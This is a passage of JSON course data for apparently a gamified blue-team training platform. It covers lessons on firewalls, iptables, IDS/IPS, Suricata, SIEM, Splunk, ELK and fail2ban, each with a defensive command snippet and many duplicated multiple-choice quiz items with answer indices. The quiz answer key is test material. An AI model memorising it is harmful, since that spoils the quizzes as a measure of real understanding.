images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"firewall-fundamentals","cat":"Defense & Blue Team","title":"Firewall Fundamentals","diff":1,"xp":50,"intro":"Control what traffic enters and leaves.","sections":[{"type":"text","content":"Stateful firewalls track connections. NGFW add application awareness and IPS."},{"type":"code","lang":"bash","content":"iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT\niptables -A INPUT -p tcp --dport 22 -j ACCEPT\niptables -A INPUT -j DROP"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"What does a stateful firewall track?","opts":["Source IPs only","Connection state","File contents","User identities"],"ans":1},{"type":"quiz","q":"A false positive in IDS means...","opts":["A real attack was detected","Normal traffic was flagged as an attack","An attack was missed","The IDS crashed"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Read-only access"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"iptables-nftables","cat":"Defense & Blue Team","title":"iptables and nftables","diff":2,"xp":150,"intro":"Linux packet filtering rules.","sections":[{"type":"text","content":"iptables uses chains (INPUT, OUTPUT, FORWARD). nftables is the modern replacement."},{"type":"code","lang":"bash","content":"iptables -A INPUT -s 10.10.10.5 -j DROP\nnft add rule inet filter input ip saddr 10.10.10.5 drop"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Modern replacement for iptables?","opts":["ufw","nftables","firewalld","pf"],"ans":1},{"type":"quiz","q":"SIEM stands for...","opts":["Security Information and Event Management","System Integration and Error Monitoring","Secure Internet Email Manager","Server Infrastructure Event Module"],"ans":0},{"type":"quiz","q":"The goal of threat hunting is...","opts":["Respond to alerts","Proactively find threats that evaded detection","Install patches","Write policies"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"ids-vs-ips","cat":"Defense & Blue Team","title":"IDS vs IPS","diff":1,"xp":50,"intro":"One detects, one prevents.","sections":[{"type":"text","content":"IDS monitors and alerts (passive). IPS blocks (inline)."},{"type":"code","lang":"bash","content":"snort -A console -c /etc/snort/snort.conf -i eth0"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Key IDS vs IPS difference?","opts":["IDS newer","IDS detects, IPS blocks","IPS monitors only","Same thing"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection only","Encrypting everything"],"ans":1},{"type":"quiz","q":"A false positive in IDS means...","opts":["A real attack was detected","Normal traffic was flagged as an attack","An attack was missed","The IDS crashed"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"suricata-rules","cat":"Defense & Blue Team","title":"Suricata IDS/IPS","diff":2,"xp":150,"intro":"Multi-threaded, protocol-aware detection.","sections":[{"type":"text","content":"Suricata adds multi-threading, JA3 fingerprinting, file extraction."},{"type":"code","lang":"bash","content":"suricata -c /etc/suricata/suricata.yaml -i eth0"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Suricata advantage over Snort?","opts":["More rules","Multi-threaded performance","Better GUI","Free license"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Read-only access"],"ans":1},{"type":"quiz","q":"SIEM stands for...","opts":["Security Information and Event Management","System Integration and Error Monitoring","Secure Internet Email Manager","Server Infrastructure Event Module"],"ans":0},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"siem-fundamentals","cat":"Defense & Blue Team","title":"SIEM Fundamentals","diff":1,"xp":75,"intro":"Centralize logs, correlate events, detect threats.","sections":[{"type":"text","content":"SIEM collects and correlates logs from across the environment."},{"type":"code","lang":"bash","content":"# Platforms: Splunk, ELK, Darknode, QRadar, Wazuh"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"SIEM stands for?","opts":["Security Incident and Error Mgmt","Security Information and Event Management","System Integration and Event Monitoring","Secure Internet Endpoint Mgmt"],"ans":1},{"type":"quiz","q":"The goal of threat hunting is...","opts":["Respond to alerts","Proactively find threats that evaded detection","Install patches","Write policies"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection only","Encrypting everything"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"splunk-basics","cat":"Defense & Blue Team","title":"Splunk SPL Basics","diff":1,"xp":100,"intro":"Search Processing Language for SOC analysts.","sections":[{"type":"text","content":"SPL queries indexed log data with stats, timechart, where."},{"type":"code","lang":"bash","content":"index=security EventCode=4625 | stats count by src_ip | sort -count"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"SPL command to count by field?","opts":["search","where","stats count by","table"],"ans":2},{"type":"quiz","q":"A false positive in IDS means...","opts":["A real attack was detected","Normal traffic was flagged as an attack","An attack was missed","The IDS crashed"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Read-only access"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"elk-stack","cat":"Defense & Blue Team","title":"ELK Stack","diff":2,"xp":150,"intro":"Elasticsearch + Logstash + Kibana = open-source SIEM.","sections":[{"type":"text","content":"Elasticsearch stores/searches, Logstash collects/parses, Kibana visualizes."},{"type":"code","lang":"bash","content":"filebeat modules enable system\nfilebeat setup && service filebeat start"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Which ELK component stores data?","opts":["Logstash","Kibana","Elasticsearch","Beats"],"ans":2},{"type":"quiz","q":"SIEM stands for...","opts":["Security Information and Event Management","System Integration and Error Monitoring","Secure Internet Email Manager","Server Infrastructure Event Module"],"ans":0},{"type":"quiz","q":"The goal of threat hunting is...","opts":["Respond to alerts","Proactively find threats that evaded detection","Install patches","Write policies"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"fail2ban-defense","cat":"Defense & Blue Team","title":"fail2ban","diff":1,"xp":50,"intro":"Auto-ban IPs that fail auth too many times.","sections":[{"type":"text","content":"Monitors logs, bans offenders with iptables."},{"type":"code","lang":"bash","content":"# /etc/fail2ban/jail.local\n[sshd]\nenabled = true\nmaxretry = 3\nbantime = 3600"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"fail2ban does after maxretry?","opts":["Sends email","Bans source IP via firewall","Restarts service","Logs attempt"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection only","Encrypting everything"],"ans":1},{"type":"quiz","q":"A false positive in IDS means...","opts":["A real attack was detected","Normal traffic was flagged as an attack","An attack was missed","The IDS crashed"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND 